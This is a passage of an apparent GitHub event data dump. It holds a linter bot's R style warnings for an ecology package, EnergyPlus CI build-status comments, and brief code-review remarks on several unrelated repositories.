1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L72) *style:* **lines should not be more than 80 characters.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:72:15:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n             ~^~~\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:75:22:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:77:53:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L79) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:80:1:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L80) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n^\n```\n[R/generateArtificialData.R:80:13:](https://github.com/thijsjanzen/STEPCAM/blob/6e82c5b0a7ca4b5b93b3cc2708f8193998f29a97/R/generateArtificialData.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n"}},"created_at":"2016-09-19T21:07:31Z"}
{"id":"4585939596","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19085745,"position":null,"line":null,"path":null,"commit_id":"9a8d5fd2527391c862699916be181773c3ace3b3","created_at":"2016-09-19T21:07:34Z","updated_at":"2016-09-19T21:07:34Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9a8d5fd2527391c862699916be181773c3ace3b3-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-19T21:07:34Z"}
{"id":"4585940802","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19085748,"position":null,"line":null,"path":null,"commit_id":"9a8d5fd2527391c862699916be181773c3ace3b3","created_at":"2016-09-19T21:07:47Z","updated_at":"2016-09-19T21:07:47Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9a8d5fd2527391c862699916be181773c3ace3b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9a8d5fd2527391c862699916be181773c3ace3b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9a8d5fd2527391c862699916be181773c3ace3b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-19T21:07:47Z"}
{"id":"4585941891","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19085751,"position":null,"line":null,"path":null,"commit_id":"9a8d5fd2527391c862699916be181773c3ace3b3","created_at":"2016-09-19T21:07:59Z","updated_at":"2016-09-19T21:07:59Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9a8d5fd2527391c862699916be181773c3ace3b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9a8d5fd2527391c862699916be181773c3ace3b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9a8d5fd2527391c862699916be181773c3ace3b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-19T21:07:59Z"}
{"id":"4585942371","type":"CommitCommentEvent","actor":{"login":"s123594"},"repo":{"name":"s123594/modellingProject"},"payload":{"comment":{"id":19085754,"position":7,"line":7,"path":"wholeFunction2d.py","commit_id":"f619d85489d523abe82b709a6d5c7a14d83d70cd","created_at":"2016-09-19T21:08:05Z","updated_at":"2016-09-19T21:08:05Z","body":"done in first correction"}},"created_at":"2016-09-19T21:08:05Z"}
{"id":"4585942649","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19085757,"position":null,"line":null,"path":null,"commit_id":"9a8d5fd2527391c862699916be181773c3ace3b3","created_at":"2016-09-19T21:08:08Z","updated_at":"2016-09-19T21:08:08Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9a8d5fd2527391c862699916be181773c3ace3b3-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-19T21:08:08Z"}
{"id":"4585944590","type":"CommitCommentEvent","actor":{"login":"wyseguyonline"},"repo":{"name":"Pearson-Higher-Ed/slider"},"payload":{"comment":{"id":19085764,"position":null,"line":null,"path":null,"commit_id":"4a8cdf18770b79e09b7363e5c8d6f32c7290ae58","created_at":"2016-09-19T21:08:28Z","updated_at":"2016-09-19T21:08:28Z","body":"In component-owner.js:\r\n\r\nMy apologies but I think I might have miscommunicated.  On line 34, displaying the current value for the slider should be something for the demo to show and not part of the component itself."}},"created_at":"2016-09-19T21:08:28Z"}
{"id":"4585946549","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"MisterAndry/sbt_dz3"},"payload":{"comment":{"id":19085769,"position":30,"line":30,"path":"ReversedIterator.java","commit_id":"24ef14b2e91121cb62490753d2c14fbab29abb62","created_at":"2016-09-19T21:08:49Z","updated_at":"2016-09-19T21:08:49Z","body":"Про исключения будет следующее занятие, но всё же отмечу, что есть контракт на метод next:\r\n@throws NoSuchElementException if the iteration has no more elements\r\nметод get коллекции имеет отличный от этого контракт:\r\n@throws IndexOutOfBoundsException if the index is out of range"}},"created_at":"2016-09-19T21:08:49Z"}
{"id":"4585949484","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19085774,"position":null,"line":null,"path":null,"commit_id":"68078838af1f026f4c987e48404f53714dccf1c3","created_at":"2016-09-19T21:09:20Z","updated_at":"2016-09-19T21:09:20Z","body":"It's a one-month old project, bugs are expected (and healthy! People are not machines, 😊)"}},"created_at":"2016-09-19T21:09:20Z"}
{"id":"4585949615","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19085775,"position":25,"line":48,"path":"src/main/java/org/spongepowered/api/item/inventory/entity/PlayerInventory.java","commit_id":"b88f5eba36f8f62892b10f17ea094d5bcb884ea1","created_at":"2016-09-19T21:09:22Z","updated_at":"2016-09-19T21:09:22Z","body":"Done https://github.com/SpongePowered/SpongeAPI/issues/1000#issuecomment-248127399"}},"created_at":"2016-09-19T21:09:22Z"}
{"id":"4585951888","type":"CommitCommentEvent","actor":{"login":"alexanderzobnin"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19085783,"position":null,"line":null,"path":null,"commit_id":"0b3050b1808fe0e1c899c5c59a79a36b3b1e946f","created_at":"2016-09-19T21:09:45Z","updated_at":"2016-09-19T21:09:45Z","body":"I mean you should use alias in every request. If user didn't set alias, use alias for metric name formatting, but if user set it, just display what he want."}},"created_at":"2016-09-19T21:09:45Z"}
